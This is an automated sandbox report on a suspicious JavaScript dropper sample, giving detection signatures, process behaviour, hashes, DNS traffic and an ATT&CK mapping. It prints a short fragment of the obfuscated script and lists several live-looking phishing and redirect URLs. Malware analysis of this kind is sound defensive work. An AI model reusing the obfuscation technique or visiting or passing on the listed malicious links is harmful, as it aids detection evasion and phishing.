Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
download.js

Overview

General Information

Sample name:download.js
Analysis ID:1559080
MD5:9357b0c94d4cbc79742037437f91bcc3
SHA1:2dea51b874477fa5e1b2dca1c3a9f0e63b0980d2
SHA256:1d4d2387cc84d022c01913e5b8c89592114b0235259a8830a6b4f2ecac1dac4d
Tags:jsKongTukeuser-monitorsg
Infos:

Detection

Score:21
Range:0 - 100
Whitelisted:false
Confidence:80%

Signatures

Sigma detected: WScript or CScript Dropper
Found WSH timer for Javascript or VBS script (likely evasive script)
Java / VBScript file with very long strings (likely obfuscated code)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Classification

  • System is w10x64
  • wscript.exe (PID: 7308 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\download.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\download.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\download.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\download.js", ProcessId: 7308, ProcessName: wscript.exe
Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\download.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\download.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\download.js", ProcessId: 7308, ProcessName: wscript.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: time.windows.com
Source: download.jsInitial sample: Strings found which are bigger than 50
Source: classification engineClassification label: sus21.winJS@1/0@1/0
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information2
Scripting
Valid AccountsWindows Management Instrumentation2
Scripting
1
DLL Side-Loading
1
DLL Side-Loading
OS Credential Dumping2
System Information Discovery
Remote ServicesData from Local System1
Non-Application Layer Protocol
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
Boot or Logon Initialization Scripts1
Obfuscated Files or Information
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
download.js5%ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.210.172
truefalse
    high
    s-part-0017.t-0009.t-msedge.net
    13.107.246.45
    truefalse
      high
      time.windows.com
      unknown
      unknownfalse
        high
        No contacted IP infos
        Joe Sandbox version:41.0.0 Charoite
        Analysis ID:1559080
        Start date and time:2024-11-20 06:58:14 +01:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 2m 16s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:3
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:download.js
        Detection:SUS
        Classification:sus21.winJS@1/0@1/0
        EGA Information:Failed
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 0
        • Number of non-executed functions: 0
        Cookbook Comments:
        • Found application associated with file extension: .js
        • Stop behavior analysis, all processes terminated
        • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
        • Excluded IPs from analysis (whitelisted): 20.101.57.9, 20.12.23.50
        • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, twc.trafficmanager.net, otelrules.afd.azureedge.net, sls.update.microsoft.com, azureedge-t-prod.trafficmanager.net, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
        No simulations
        No context
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        s-part-0017.t-0009.t-msedge.netfile.exeGet hashmaliciousLummaCBrowse
        • 13.107.246.45
        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
        • 13.107.246.45
        file.exeGet hashmaliciousLummaCBrowse
        • 13.107.246.45
        https://www.google.co.ao/url?Obdy=ObM8wNGVUva21gnTm3qS&cgsr=7knoOQwChvIkzgfn0TSm&sa=t&wofc=nQYL5DF797O1da77PTBQ&url=amp%2Fprimer-distrito-amvt.org%2F.r%2FiO8EME-SUREDANNaW50ZXJtb2RhbC5qYXhAc2VhYm9hcmRtYXJpbmUuY29tGet hashmaliciousUnknownBrowse
        • 13.107.246.45
        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
        • 13.107.246.45
        file.exeGet hashmaliciousLummaCBrowse
        • 13.107.246.45
        https://estudioit.cl/starl/#ZGVicmEuY2FydGVyQGNhc2EuZ292LmF1Get hashmaliciousUnknownBrowse
        • 13.107.246.45
        http://www.dvdcollections.co.uk/search/redirect.php?deeplink=https://lp-engenharia.com/zerooo/?email=mwright@burbankca.govGet hashmaliciousHTMLPhisherBrowse
        • 13.107.246.45
        file.exeGet hashmaliciousLummaCBrowse
        • 13.107.246.45
        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
        • 13.107.246.45
        bg.microsoft.map.fastly.netfile.exeGet hashmaliciousCredential FlusherBrowse
        • 199.232.214.172
        file.exeGet hashmaliciousUnknownBrowse
        • 199.232.210.172
        Benefit Enrollment -wZ5nusm.pdfGet hashmaliciousUnknownBrowse
        • 199.232.214.172
        6GvQSVIEIu.exeGet hashmaliciousUnknownBrowse
        • 199.232.210.172
        Benefit Enrollment -eGz8VNb.pdfGet hashmaliciousUnknownBrowse
        • 199.232.214.172
        217469812STM.pdfGet hashmaliciousScreenConnect Tool, PhisherBrowse
        • 199.232.210.172
        file.exeGet hashmaliciousRemcosBrowse
        • 199.232.214.172
        file.exeGet hashmaliciousCredential FlusherBrowse
        • 199.232.210.172
        beacon_x64.exeGet hashmaliciousCobaltStrikeBrowse
        • 199.232.210.172
        DellTpm1.2_Fw5.81.2.1_V3_64.exeGet hashmaliciousUnknownBrowse
        • 199.232.214.172
        No context
        No context
        No context
        No created / dropped files found
        File type:ASCII text, with very long lines (12351), with CRLF line terminators
        Entropy (8bit):6.050021771009888
        TrID:
          File name:download.js
          File size:21'059 bytes
          MD5:9357b0c94d4cbc79742037437f91bcc3
          SHA1:2dea51b874477fa5e1b2dca1c3a9f0e63b0980d2
          SHA256:1d4d2387cc84d022c01913e5b8c89592114b0235259a8830a6b4f2ecac1dac4d
          SHA512:b9929209a4fa61db03c0541833d0bf374a7c8b3b41d29ed2a99e16e12e629a5cf1a4485c39034776b636c3de79e223a244660d828de025e5f5f157f81562b1bf
          SSDEEP:384:8f+ziLEnu1IG9SKPOf2x5P7Q93OyUjJPkCLfgNTWQh:85IGeOx5PcuJ7U5h
          TLSH:B0928D83B789F4F942DD956E9E53780C76252C3FC18A9DC4F6E2EA8373816401F84E86
          File Content Preview:$frwmhd=$executioncontext;$retionoredatisonreaterarinatrees = ([cHAr[]]@((-4108+4161),(-2458+2510),(158175/2775),(10292-(13498-3256)),(565152/(9022+(6106490/(55888651/(19648-(2018+7837)))))),(9958-9904),(6467-6411),(-5483+(25945530/4685)),(385440/(611+639
          Icon Hash:68d69b8bb6aa9a86
          TimestampSource PortDest PortSource IPDest IP
          Nov 20, 2024 06:59:19.353250980 CET6168653192.168.2.71.1.1.1
          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
          Nov 20, 2024 06:59:19.353250980 CET192.168.2.71.1.1.10x82c8Standard query (0)time.windows.comA (IP address)IN (0x0001)false
          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
          Nov 20, 2024 06:59:19.360542059 CET1.1.1.1192.168.2.70x82c8No error (0)time.windows.comtwc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
          Nov 20, 2024 06:59:21.234457016 CET1.1.1.1192.168.2.70xbdf4No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
          Nov 20, 2024 06:59:21.234457016 CET1.1.1.1192.168.2.70xbdf4No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
          Nov 20, 2024 06:59:41.560693026 CET1.1.1.1192.168.2.70x68cfNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
          Nov 20, 2024 06:59:41.560693026 CET1.1.1.1192.168.2.70x68cfNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false

          Click to jump to process

          Click to jump to process

          Click to dive into process behavior distribution

          Target ID:0
          Start time:00:59:23
          Start date:20/11/2024
          Path:C:\Windows\System32\wscript.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\download.js"
          Imagebase:0x7ff762270000
          File size:170'496 bytes
          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          No disassembly